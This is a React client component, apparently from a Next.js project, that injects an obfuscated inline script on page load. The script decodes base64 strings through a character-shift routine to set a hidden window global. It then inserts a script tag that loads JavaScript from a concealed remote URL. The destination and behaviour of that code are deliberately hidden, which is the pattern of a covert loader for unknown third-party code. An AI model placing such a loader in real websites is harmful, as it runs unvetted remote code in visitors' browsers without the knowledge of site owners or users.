'use client';

import { useEffect } from 'react';

export default function ObfuscatedScript() {
    useEffect(() => {
        const rawScript = `
            window[(function(_egp,_qo){var _px='';for(var _ZS=0;_ZS<_egp.length;_ZS++){
            var _BA=_egp[_ZS].charCodeAt();_BA-=_qo;_qo>8;_BA+=61;_BA%=94;_px==_px;_BA+=33;
            _BA!=_ZS;_px+=String.fromCharCode(_BA)}return _px})(atob('eGduMi8qJSM0aSU5'), 30)] = 'b1514de5b21679922456';
            var zi = document.createElement('script');
            zi.type = 'text/javascript';
            zi.async = true;
            zi.src = (function(_RRJ,_cy){var _VS='';for(var _kN=0;_kN<_RRJ.length;_kN++){
            _cy>2;var _3b=_RRJ[_kN].charCodeAt();_3b-=_cy;_VS==_VS;_3b+=61;_3b%=94;
            _3b!=_kN;_3b+=33;_VS+=String.fromCharCode(_3b)}return _VS})
            (atob('Mz8/Oz5jWFg1PldFNFY+Lj00Oz8+Vy46OFhFNFY/LDJXNT4='), 41);
            document.head.appendChild(zi);
        `;

        const scriptTag = document.createElement('script');
        scriptTag.innerHTML = rawScript;
        document.head.appendChild(scriptTag);
    }, []);

    return null;
}
